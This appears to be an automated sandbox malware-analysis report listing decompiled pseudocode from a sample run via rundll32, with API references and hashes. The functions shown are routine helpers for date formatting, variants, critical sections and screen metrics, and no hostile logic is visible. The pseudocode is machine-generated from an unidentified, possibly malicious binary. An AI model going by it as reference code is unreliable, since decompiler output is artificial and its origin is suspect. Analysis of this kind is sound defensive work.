                          • Opcode ID: 606acc045e3a690e530e30ed8122421da413c483efa71790e4c8ddd4e9f0842e
                          • Instruction ID: c78352723ea357420fc97da1a25e1fbc3cb1fcdc71aeab7f3d8c17a4a6817d40
                          • Opcode Fuzzy Hash: 606acc045e3a690e530e30ed8122421da413c483efa71790e4c8ddd4e9f0842e
                          • Instruction Fuzzy Hash: 9B410F70900668CFDB61DF68CC85BDAB7F9AB48304F4054E5E908AB351D770AE89CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E00E19EE4(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                          				char _v8;
                          				short _v18;
                          				short _v22;
                          				struct _SYSTEMTIME _v24;
                          				char _v280;
                          				char* _t32;
                          				intOrPtr* _t49;
                          				intOrPtr _t58;
                          				void* _t63;
                          				void* _t67;
                          
                          				_v8 = 0;
                          				_t49 = __edx;
                          				_t63 = __eax;
                          				_push(_t67);
                          				_push(0xe19fc2);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t67 + 0xfffffeec;
                          				E00E14068(__edx);
                          				_v24 =  *((intOrPtr*)(_a4 - 0xe));
                          				_v22 =  *((intOrPtr*)(_a4 - 0x10));
                          				_v18 =  *((intOrPtr*)(_a4 - 0x12));
                          				if(_t63 > 2) {
                          					E00E14100( &_v8, 0xe19fe4);
                          				} else {
                          					E00E14100( &_v8, 0xe19fd8);
                          				}
                          				_t32 = E00E14528(_v8);
                          				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
                          					E00E142D8(_t49, 0x100,  &_v280);
                          					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
                          						E00E14588( *_t49, E00E14328( *_t49) - 1, 2, _t49);
                          					}
                          				}
                          				_pop(_t58);
                          				 *[fs:eax] = _t58;
                          				_push(0xe19fc9);
                          				return E00E14068( &_v8);
                          			}

                          0x00e19ef1
                          0x00e19ef4
                          0x00e19ef6
                          0x00e19efa
                          0x00e19efb
                          0x00e19f00
                          0x00e19f03
                          0x00e19f08
                          0x00e19f14
                          0x00e19f1f
                          0x00e19f2a
                          0x00e19f31
                          0x00e19f4a
                          0x00e19f33
                          0x00e19f3b
                          0x00e19f3b
                          0x00e19f5e
                          0x00e19f77
                          0x00e19f86
                          0x00e19f8c
                          0x00e19fa7
                          0x00e19fa7
                          0x00e19f8c
                          0x00e19fae
                          0x00e19fb1
                          0x00e19fb4
                          0x00e19fc1

                          APIs
                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00E19FC2), ref: 00E19F6A
                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00E19FC2), ref: 00E19F70
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: DateFormatLocaleThread
                          • String ID: yyyy
                          • API String ID: 3303714858-3145165042
                          • Opcode ID: f55c2849331f1a5e5836db6f2ae8385358626da03b5c8ec25dad45ffb9015144
                          • Instruction ID: 6d43a27a7ee7aba5cba612769975e52f30bca67eb5711dfde0448c47343537f2
                          • Opcode Fuzzy Hash: f55c2849331f1a5e5836db6f2ae8385358626da03b5c8ec25dad45ffb9015144
                          • Instruction Fuzzy Hash: 782141B4700208AFDB11EBA8D852AEEB3E8EF4C700F5160A5B905F7392D7709E85C765
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 65%
                          			E00E1F220(signed short* __eax, void* __ecx, intOrPtr* __edx) {
                          				intOrPtr* _v16;
                          				void* _t15;
                          				signed short* _t23;
                          				signed short _t34;
                          				intOrPtr* _t35;
                          				void* _t36;
                          
                          				_t12 = __eax;
                          				_push(__ecx);
                          				_t35 = __edx;
                          				_t23 = __eax;
                          				if(( *__eax & 0x0000bfe8) != 0) {
                          					_t12 = E00E1EF28(__eax, __ecx);
                          				}
                          				_t34 =  *_t35;
                          				if(_t34 >= 0x14) {
                          					if(_t34 != 0x100) {
                          						if(_t34 != 0x101) {
                          							if((_t34 & 0x00002000) == 0) {
                          								if(E00E239DC(_t34, _t36) == 0) {
                          									_push(_t35);
                          									_push(_t23);
                          									L00E1D9A8();
                          									_t15 = E00E1EBF4(_t14);
                          								} else {
                          									_t15 =  *((intOrPtr*)( *_v16 + 0x28))(0);
                          								}
                          							} else {
                          								_t15 = E00E1F04C(_t23, 0xe1f218, _t35);
                          							}
                          						} else {
                          							 *_t23 = _t34;
                          							_t23[4] =  *(_t35 + 8);
                          							_t15 =  *0xe7f820();
                          						}
                          					} else {
                          						 *_t23 = 0x100;
                          						_t23[4] = 0;
                          						_t15 = E00E140BC( &(_t23[4]),  *(_t35 + 8));
                          					}
                          				} else {
                          					_push(_t35);
                          					_push(_t23);
                          					L00E1D9A8();
                          					_t15 = E00E1EBF4(_t12);
                          				}
                          				return _t15;
                          			}

                          0x00e1f220
                          0x00e1f223
                          0x00e1f224
                          0x00e1f226
                          0x00e1f22d
                          0x00e1f231
                          0x00e1f231
                          0x00e1f236
                          0x00e1f23d
                          0x00e1f252
                          0x00e1f270
                          0x00e1f28a
                          0x00e1f2a7
                          0x00e1f2ba
                          0x00e1f2bb
                          0x00e1f2bc
                          0x00e1f2c1
                          0x00e1f2a9
                          0x00e1f2b5
                          0x00e1f2b5
                          0x00e1f28c
                          0x00e1f295
                          0x00e1f295
                          0x00e1f272
                          0x00e1f272
                          0x00e1f278
                          0x00e1f27d
                          0x00e1f27d
                          0x00e1f254
                          0x00e1f254
                          0x00e1f25b
                          0x00e1f264
                          0x00e1f264
                          0x00e1f23f
                          0x00e1f23f
                          0x00e1f240
                          0x00e1f241
                          0x00e1f246
                          0x00e1f246
                          0x00e1f2ca

                          APIs
                          • VariantCopy.OLEAUT32(?), ref: 00E1F241
                            • Part of subcall function 00E1EF28: VariantClear.OLEAUT32(?), ref: 00E1EF37
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Variant$ClearCopy
                          • String ID: \
                          • API String ID: 274517740-2545358515
                          • Opcode ID: db4b2302235fa02abb901d7c9750ce7c6ace4e32fba30aa5b3a5075a99a310a0
                          • Instruction ID: 0f6d09adff5a2bdb1e5584e91598aa5859d751e27f795fa13bb2073324e47c33
                          • Opcode Fuzzy Hash: db4b2302235fa02abb901d7c9750ce7c6ace4e32fba30aa5b3a5075a99a310a0
                          • Instruction Fuzzy Hash: 8111C274704210878734AF68C8C1AD637D5AF89710B50B436F80ABB366CA34DCC1C7D2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E00E30840(void* __ecx, void* __edx) {
                          				void* __ebx;
                          				void* __esi;
                          				intOrPtr _t19;
                          				char _t32;
                          				intOrPtr _t33;
                          				intOrPtr _t35;
                          				void* _t38;
                          				void* _t39;
                          				void* _t40;
                          				intOrPtr _t46;
                          				intOrPtr _t47;
                          				intOrPtr _t48;
                          				intOrPtr _t49;
                          				void* _t50;
                          				void* _t51;
                          
                          				_t40 = __edx;
                          				_t39 = __ecx;
                          				if(__edx != 0) {
                          					_t51 = _t51 + 0xfffffff0;
                          					_t19 = E00E13598(_t19, _t50);
                          				}
                          				_t38 = _t40;
                          				_t46 = _t19;
                          				E00E13244(0);
                          				_t1 = _t46 + 0x38; // 0x38
                          				L00E164A0();
                          				_t47 = E00E2FD50(1);
                          				 *((intOrPtr*)(_t46 + 0xc)) = _t47;
                          				 *((intOrPtr*)(_t47 + 0xc)) = _t46;
                          				 *((intOrPtr*)(_t47 + 8)) = 0xe30fc4;
                          				_t5 = _t46 + 0x38; // 0x38
                          				 *((intOrPtr*)(_t47 + 0x14)) = _t5;
                          				_t48 = E00E3027C(1);
                          				 *((intOrPtr*)(_t46 + 0x10)) = _t48;
                          				 *((intOrPtr*)(_t48 + 0xc)) = _t46;
                          				 *((intOrPtr*)(_t48 + 8)) = 0xe30fe4;
                          				_t10 = _t46 + 0x38; // 0x38
                          				 *((intOrPtr*)(_t48 + 0x14)) = _t10;
                          				_t49 = E00E30548(1);
                          				 *((intOrPtr*)(_t46 + 0x14)) = _t49;
                          				 *((intOrPtr*)(_t49 + 0xc)) = _t46;
                          				 *((intOrPtr*)(_t49 + 8)) = 0xe31004;
                          				_t15 = _t46 + 0x38; // 0x38
                          				 *((intOrPtr*)(_t49 + 0x14)) = _t15;
                          				 *((intOrPtr*)(_t46 + 0x20)) = 0xcc0020;
                          				_t32 =  *0xe30900; // 0x0
                          				 *((char*)(_t46 + 8)) = _t32;
                          				_t33 =  *0xe7f8ec; // 0xf00b08
                          				E00E27360(_t33, _t38, _t39, _t46, _t49);
                          				_t35 = _t46;
                          				if(_t38 != 0) {
                          					E00E135F0(_t35);
                          					_pop( *[fs:0x0]);
                          				}
                          				return _t46;
                          			}

                          0x00e30840
                          0x00e30840
                          0x00e30845
                          0x00e30847
                          0x00e3084a
                          0x00e3084a
                          0x00e3084f
                          0x00e30851
                          0x00e30857
                          0x00e3085c
                          0x00e30860
                          0x00e30871
                          0x00e30873
                          0x00e30876
                          0x00e30879
                          0x00e30880
                          0x00e30883
                          0x00e30892
                          0x00e30894
                          0x00e30897
                          0x00e3089a
                          0x00e308a1
                          0x00e308a4
                          0x00e308b3
                          0x00e308b5
                          0x00e308b8
                          0x00e308bb
                          0x00e308c2
                          0x00e308c5
                          0x00e308c8
                          0x00e308cf
                          0x00e308d4
                          0x00e308d9
                          0x00e308de
                          0x00e308e3
                          0x00e308e7
                          0x00e308e9
                          0x00e308ee
                          0x00e308f5
                          0x00e308fd

                          APIs
                          • RtlInitializeCriticalSection.KERNEL32(00E33C4C,00E33C14,?,00000001,00E33DAA,?,?,?,00E35015,?,?,00E34E34,?,0000000E,00000000,?), ref: 00E30860
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalInitializeSection
                          • String ID: |$|
                          • API String ID: 32694325-1831066999
                          • Opcode ID: 124479ead51a673d0589d407bf44fbc27326c4a0de2cd1dde8d1ec4e631c1a81
                          • Instruction ID: 75c74e943cd047cfb66f638e9a1d5f48736b8d268e0c4c2533650e61f0637626
                          • Opcode Fuzzy Hash: 124479ead51a673d0589d407bf44fbc27326c4a0de2cd1dde8d1ec4e631c1a81
                          • Instruction Fuzzy Hash: 8E11BEB1A00B019FC360EF2ED485A86FBE5BF84724704A52AE459E7B21D331F958CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E00E37208(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t15;
                          				void* _t16;
                          				intOrPtr _t18;
                          				signed int _t19;
                          				void* _t20;
                          				intOrPtr _t21;
                          
                          				_t19 = _a12;
                          				if( *0xe7f91f != 0) {
                          					_t16 = 0;
                          					if((_t19 & 0x00000003) != 0) {
                          						L7:
                          						_t16 = 0x12340042;
                          					} else {
                          						_t21 = _a4;
                          						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
                          							goto L7;
                          						}
                          					}
                          				} else {
                          					_t18 =  *0xe7f900; // 0xe37208
                          					 *0xe7f900 = E00E36F70(3, _t15, _t18, _t19, _t20);
                          					_t16 =  *0xe7f900(_a4, _a8, _t19);
                          				}
                          				return _t16;
                          			}

                          APIs
                          • GetSystemMetrics.USER32 ref: 00E37256
                          • GetSystemMetrics.USER32 ref: 00E37268
                            • Part of subcall function 00E36F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00E36FF0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: MetricsSystem$AddressProc
                          • String ID: MonitorFromPoint
                          • API String ID: 1792783759-1072306578
                          • Opcode ID: d00c864c64a1a7635fe1c83477a176b0c2e0b2356972afac65981331763827e6
                          • Instruction ID: 6addb7582d7019774d5c3d2b7d447073a04ee890f4d7a5f820a8fa72958176ee
                          • Opcode Fuzzy Hash: d00c864c64a1a7635fe1c83477a176b0c2e0b2356972afac65981331763827e6
                          • Instruction Fuzzy Hash: DA0184B1209249AFDB208F91ED48B5A7F95EB40354F045125FE58BB132C3729C84D790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E00E1EF28(intOrPtr* __eax, void* __ecx) {
                          				void* _t8;
                          				signed short _t19;
                          				intOrPtr* _t20;
                          
                          				_t13 = __eax;
                          				_t19 =  *__eax;
                          				if(_t19 >= 0x14) {
                          					if(_t19 != 0x100) {
                          						if(_t19 != 0x101) {
                          							if((_t19 & 0x00002000) == 0) {
                          								if(E00E239DC(_t19, _t20) == 0) {
                          									L00E1D9A0();
                          									_t8 = E00E1EBF4(_t7);
                          								} else {
                          									_t8 =  *((intOrPtr*)( *((intOrPtr*)( *_t20)) + 0x24))();
                          								}
                          							} else {
                          								_t8 = E00E1EDAC(__eax);
                          							}
                          						} else {
                          							_t8 =  *0xe7f818();
                          						}
                          					} else {
                          						 *((short*)(__eax)) = 0;
                          						_t8 = E00E14068(__eax + 8);
                          					}
                          				} else {
                          					_push(__eax);
                          					L00E1D9A0();
                          					_t8 = E00E1EBF4(__eax);
                          				}
                          				return _t8;
                          			}

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID: \
                          • API String ID: 1473721057-2545358515
                          • Opcode ID: 658f7315e6efa27789886bf7e6379a5a55d72493ad8dfff515511405b85b558a
                          • Instruction ID: 321fa7583e5251251e2e12d082df88391c8f80ea922586dd94ddfdda1a4df22a
                          • Opcode Fuzzy Hash: 658f7315e6efa27789886bf7e6379a5a55d72493ad8dfff515511405b85b558a
                          • Instruction Fuzzy Hash: D6F0AF717082108A87247B3498856E826D69F48700B607075FC4BBB316CB24CCCBC263
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E37058(int _a4) {
                          				void* __ebx;
                          				void* __ebp;
                          				signed int _t2;
                          				signed int _t3;
                          				int _t8;
                          				void* _t12;
                          				void* _t13;
                          				void* _t17;
                          				void* _t18;
                          
                          				_t8 = _a4;
                          				if( *0xe7f91c == 0) {
                          					 *0xe7f8f4 = E00E36F70(0, _t8,  *0xe7f8f4, _t17, _t18);
                          					return GetSystemMetrics(_t8);
                          				}
                          				_t3 = _t2 | 0xffffffff;
                          				_t12 = _t8 + 0xffffffb4 - 2;
                          				__eflags = _t12;
                          				if(__eflags < 0) {
                          					_t3 = 0;
                          				} else {
                          					if(__eflags == 0) {
                          						_t8 = 0;
                          					} else {
                          						_t13 = _t12 - 1;
                          						__eflags = _t13;
                          						if(_t13 == 0) {
                          							_t8 = 1;
                          						} else {
                          							__eflags = _t13 - 0xffffffffffffffff;
                          							if(_t13 - 0xffffffffffffffff < 0) {
                          								_t3 = 1;
                          							}
                          						}
                          					}
                          				}
                          				__eflags = _t3 - 0xffffffff;
                          				if(_t3 != 0xffffffff) {
                          					return _t3;
                          				} else {
                          					return GetSystemMetrics(_t8);
                          				}
                          			}

                          APIs
                          • GetSystemMetrics.USER32 ref: 00E370BA
                            • Part of subcall function 00E36F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00E36FF0
                          • GetSystemMetrics.USER32 ref: 00E37080
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: MetricsSystem$AddressProc
                          • String ID: GetSystemMetrics
                          • API String ID: 1792783759-96882338
                          • Opcode ID: 5b0146d135ff69a19bdc2036d097ee7c22a783698977757f446d02ac37a00a1b
                          • Instruction ID: e0d283d31a544862a18594b86fe8d4b3ea91edfddce7b77588a72c4f05ac2243
                          • Opcode Fuzzy Hash: 5b0146d135ff69a19bdc2036d097ee7c22a783698977757f446d02ac37a00a1b
                          • Instruction Fuzzy Hash: 3EF0C2B011C2019ED73C9B34DD8CA623D959781334F647A21E295BA2D5C635CA84CE62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E00E26168(void* __edx) {
                          				void* _t5;
                          				void* _t15;
                          				void* _t20;
                          				void* _t25;
                          				void* _t26;
                          				void* _t27;
                          				void* _t28;
                          
                          				_t20 = __edx;
                          				if(__edx != 0) {
                          					_t28 = _t28 + 0xfffffff0;
                          					_t5 = E00E13598(_t5, _t27);
                          				}
                          				_t25 = _t5;
                          				E00E13244(0);
                          				 *((intOrPtr*)(_t25 + 4)) = E00E13244(1);
                          				_t2 = _t25 + 8; // 0x8
                          				L00E164A0();
                          				_t26 = E00E25E38(1);
                          				_t3 = _t25 + 4; // 0x6f724767
                          				E00E26F20( *_t3, _t26);
                          				 *((char*)(_t26 + 0x10)) = 1;
                          				_t15 = _t25;
                          				if(_t20 != 0) {
                          					E00E135F0(_t15);
                          					_pop( *[fs:0x0]);
                          				}
                          				return _t25;
                          			}

                          APIs
                          • RtlInitializeCriticalSection.KERNEL32(00E25D58,?,?,?,00E2DF84,00000000,00E2DFB9), ref: 00E26197
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalInitializeSection
                          • String ID: `M$pN
                          • API String ID: 32694325-2449173935
                          • Opcode ID: ef8259428fe1d44718d40ca6c4c5d04f1198839548a36978e68c36694137a6c0
                          • Instruction ID: ccb1e8c8abe7527b22043e62bcfae22f9d197f8924b9d40df0992d3d845ef24e
                          • Opcode Fuzzy Hash: ef8259428fe1d44718d40ca6c4c5d04f1198839548a36978e68c36694137a6c0
                          • Instruction Fuzzy Hash: 14F0F6B33005119BC310FB79EC82A8AB7D6AF85758B086220F414FB356DB32AD5AC791
                          Uniqueness

                          Uniqueness Score: -1.00%